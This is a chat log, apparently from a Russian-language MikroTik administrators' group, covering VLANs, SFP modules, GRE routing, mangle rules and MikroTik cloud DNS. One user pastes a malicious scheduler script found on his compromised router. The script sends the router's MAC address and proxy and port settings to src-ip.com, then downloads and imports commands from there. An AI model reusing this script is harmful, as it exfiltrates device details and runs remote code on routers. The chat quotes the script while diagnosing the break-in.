
Hab
09.10.2018
11:55:17
странно.
где то читал про это, но это все не точно)))

Konstantin
09.10.2018
11:55:40

Andrey
09.10.2018
12:02:57
А на актуальных прошивках рос, всю работу с вланами теперь через бридж рекомендуется выполнять?

Sergiy
09.10.2018
12:06:49
там конекторы тоже свои идут. Под более толстые жилы

Google

Arctic
09.10.2018
12:10:58

Дмитрий
09.10.2018
12:15:18
Подскажите, как исправить проблему, в логе видно только крайную операцию

Arctic
09.10.2018
12:15:26

Дмитрий
09.10.2018
12:15:26

Arctic
09.10.2018
12:15:41
вот это вызывает вопросы
/system scheduler export

Дмитрий
09.10.2018
12:16:41
:global mac [/interface ethernet get 1 mac-address]
:global port ([/ip service get winbox port]."_".[/ip socks get port]."_".[/ip proxy get port])
:global info ([/ip socks get enabled]."_".[/ip proxy get enabled]."_".[/interface pptp-server server get enabled])
:global cmd "/$mac/$port/$info/dns"
/tool fetch address=src-ip.com src-path=$cmd mode=http dst-path=dns;:delay 3s
/import dns;:delay 4s;/file remove dns

Arctic
09.10.2018
12:17:31
/system log pri

Дмитрий
09.10.2018
12:18:21
[lebedev@MikroTik] > /system log pri
Flags: X - disabled, I - invalid, * - default
# TOPICS ACTION PREFIX
0 * info memory
1 * error memory
2 * warning memory
3 * critical echo

Arctic
09.10.2018
12:18:53
а что в шедулере?

Дмитрий
09.10.2018
12:19:24

Google

Дмитрий
09.10.2018
12:19:48
поломали микрот и накуявертили прокси

Ilya
09.10.2018
12:20:32

Дмитрий
09.10.2018
12:22:00

vvchumanov
09.10.2018
12:22:15
Народ подскажите кто ставил на rb2011 в sfp модуль - SFP WDM 1.25G Tx1310/Rx1550 3km SC DDM
Работает? Не надо костылять?

Скептический анализ неверных действий наркоманов
09.10.2018
12:23:43

vvchumanov
09.10.2018
12:25:13
Понятно спасибо

Arctic
09.10.2018
12:26:27

vvchumanov
09.10.2018
12:27:50
SSD связьстройдеталь, но они явно у китайцев выкупают

Arctic
09.10.2018
12:29:37
если модуль живой и соответствует скорости порта - некротик сожрёт всё

vvchumanov
09.10.2018
12:30:44

Nikolai
09.10.2018
12:46:06
коллеги, добрый вечер. Обратилс ко мне коллега с проблемой IP туннеля, типа не работает , я ему посоветовал настроить GRE , помог , но вопрос в следующем, нет пингов в локалку . Убрал статические маршруты, поднял RIP , всё равно нет . С маршрутизаторов всё пингуется, а вот что за натом, уже нет . В маскараде интерфейс не указывали, в фаерволе все дропы отрублены, подскажите где копнуть ?
Добавить на обоих роутерах в начало списка правил /ip firewall mangle правило, логирующее icmp пакеты.
Запустить пинг с компа в одной локалке на комп в другой.
Поглядеть в логи.

Konstantin
09.10.2018
12:47:01

Nikolai
09.10.2018
12:48:12
Ну, не хотите в mangle, слелайте в filter. Только там обычно набито другими правилами, а в mangle посвободнее ?

Konstantin
09.10.2018
12:49:04

Sergey
09.10.2018
12:50:23
кто знает в материнках MikroTik RBM33G и MikroTik RBM11G датчик напряжения и температуры есть?

Вячеслав
09.10.2018
12:51:06
в 11G нету

Nikolai
09.10.2018
12:55:56
А чего там сложного? Обычное правило.

Konstantin
09.10.2018
12:56:41
Они куда то же писаться должны , явно не в log

Google

Nikolai
09.10.2018
12:57:34
Тогда Вам стОит нанять сисадмина и продолжить настраивать 1С

Konstantin
09.10.2018
12:57:48

Sergey
09.10.2018
13:03:28

Ilya
09.10.2018
13:11:55
счётчик срабатываний в винбоксе и покажет - есть попадания в условие, или нет

Игорь
09.10.2018
13:13:01
можно ли как-то заакцептить трафик в мангл и при это его промаркеровать для косов?
ну т.е. двумя правилами

Ilya
09.10.2018
13:15:40
акцептится в фаерволе
мангл - для пометки

Arctic
09.10.2018
13:16:04
есть действие пасру, его нужно активнее использовать, акцепты в нате или фильтрах
https://kb.vmware.com/s/article/1027511?CoveoV2.CoveoLightningApex.getInitializationData=1&ui-force-components-controllers-hostConfig.HostConfig.getConfigData=1&r=2&other.KM_Utility.getArticleDetails=1&other.KM_Utility.getArticleMetadata=1&other.KM_Utility.getUrl=1&other.KM_Utility.getUser=1&other.KM_Utility.getAllTranslatedLanguages=1&ui-comm-runtime-components-aura-components-siteforce-qb.Quarterback.validateRoute=1
вот такая прелесть с CHR

Игорь
09.10.2018
13:17:27
с какой целью тогда в мангл акцепт есть?

Arctic
09.10.2018
13:18:16
закончить путешествие по цепочкам

Ilya
09.10.2018
13:18:45
выйти из колеса Сансары

Лаврентий
09.10.2018
13:20:02

Support
09.10.2018
13:34:14
Коллеги, а как выключить облако микротика, чтоб днс имя не пингловалось? Галочку в ip-cloud снял, а все равно доступ остался.

Ilya
09.10.2018
13:36:00
галочка -это обновление на их клауде DNS-записи, скорее всего
сколько там TTL у неё, посмотрите

Google

Даниил
09.10.2018
13:36:48
час
...

Support
09.10.2018
13:36:52
то есть пока ип не поменяетя - будет дотупен по имени?

Даниил
09.10.2018
13:36:56
если скрипт не обновит
да

Ilya
09.10.2018
13:37:19
пока A-запись не заэкспайрится
ну это в теории

Support
09.10.2018
13:38:33
а где запись удалить можно? в connections или где она висит?

Ilya
09.10.2018
13:38:51
не, это же на их сервере запись

Support
09.10.2018
13:40:32
интересно) в общем или ждать или менять принудительно ип?

Admin
ERROR: S client not available

Ilya
09.10.2018
13:40:39
а смысл?

Даниил
09.10.2018
13:40:51
в днс сервере их висит
2 недели

Ilya
09.10.2018
13:40:56
вас прям брутят по этому адресу/имени?

Даниил
09.10.2018
13:40:57
потом офф
лте модем
воткнули обновили
выкинули...

Ilya
09.10.2018
13:41:38
ну да. Или бесплатный ВПН какой-нибудь типа zoogvpn поднять на роутере

Google

Даниил
09.10.2018
13:41:50
тоже вариант

Ilya
09.10.2018
13:42:14
так-то невелика беда, на мой взгляд

Support
09.10.2018
13:42:19

Ilya
09.10.2018
13:42:39
дык просто перестаньте беспокоиться, и всё)

Даниил
09.10.2018
13:42:53
так какая вам разница

Support
09.10.2018
13:42:53
та это понятно))

Даниил
09.10.2018
13:42:57
резолв не резолв
бог с ним

Ilya
09.10.2018
13:43:17
там имя такое, что реально адрес проще подобрать или запомнить

Support
09.10.2018
13:44:01
сервер был прокинут просто по этому адресу, теперь хочется чтоб перестал быть доступным по нему

Даниил
09.10.2018
13:44:33
выше озвученны варианты

Support
09.10.2018
13:44:34
ладно, будет ждать 2 недели)) спасибо за инфу

Даниил
09.10.2018
13:44:46
дело на 5 минут

Ilya
09.10.2018
14:09:27
Блин, журналюги попросыпались, что ли? Отовсюду про уязвимость микротиков и апрельские патчи

Игорь
09.10.2018
14:16:03

Ilya
09.10.2018
14:16:49
D-Link? Тенда?

Алексей
09.10.2018
14:17:49

Игорь
09.10.2018
14:19:47

Алексей
09.10.2018
14:20:42

Nikolai
09.10.2018
14:21:17
Сиська со своими индусами уже и энтерпрайз помалу сливает.
Вот вам 100 (СТО!) уязвимостей сисек только с начала сентября. Из них 10 - CRITICAL:
https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=100#~Vulnerabilities

Алексей
09.10.2018
14:22:29

Игорь
09.10.2018
14:23:45
да если бы routeros переписали на rust то уязвимостей (не логических) совсем бы не было

Dmitrii
09.10.2018
14:24:33